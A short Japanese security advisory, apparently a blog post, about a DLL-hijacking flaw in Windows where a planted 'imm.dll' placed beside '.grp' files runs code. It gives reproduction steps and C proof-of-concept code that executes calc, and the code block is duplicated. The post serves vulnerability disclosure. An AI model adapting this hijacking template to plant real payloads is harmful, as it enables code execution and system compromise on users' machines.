本件のセキュリティ情報は前回の内容の続きです。
Windows OSのプログラムグルップのDLL(imm.dll)にセキュリティバグがありパソコンのシステム権限を取られる可能性とステムのコマンドを実行される可能性が高いです。本件の問題について「.grp」ファイルを使っているWindowsシステムに影響が出ます。
再現仕方は下記のコードをコンパイルしたらimm.dllにリネームし、「.grp」があるファイルのフォルダーにコピーをすると再現が出来ます。この再現方法はインターネットで交換されている状況です。もしマルウェアは本件の問題情報を使うとマルウェア感染仕組みを作くる可能性が高いです。imm.dllと.grpの関係セキュリティパッチが必要です。
#include <windows.h>
#define DLLIMPORT __declspec (dllexport)
DLLIMPORT void hook_startup() { evil(); }
int evil()
{
WinExec("calc", 0);
exit(0);
return 0;
}
#define DLLIMPORT __declspec (dllexport)
DLLIMPORT void hook_startup() { evil(); }
int evil()
{
WinExec("calc", 0);
exit(0);
return 0;
}
現在メーカーからの対応を待ち状況になり、現時点では本件セキュリティ問題はゼロデイ状況です。
----
http://0day.jp
ゼロデイ・リサーチチーム
アドリアン ヘンドリック
0 件のコメント:
コメントを投稿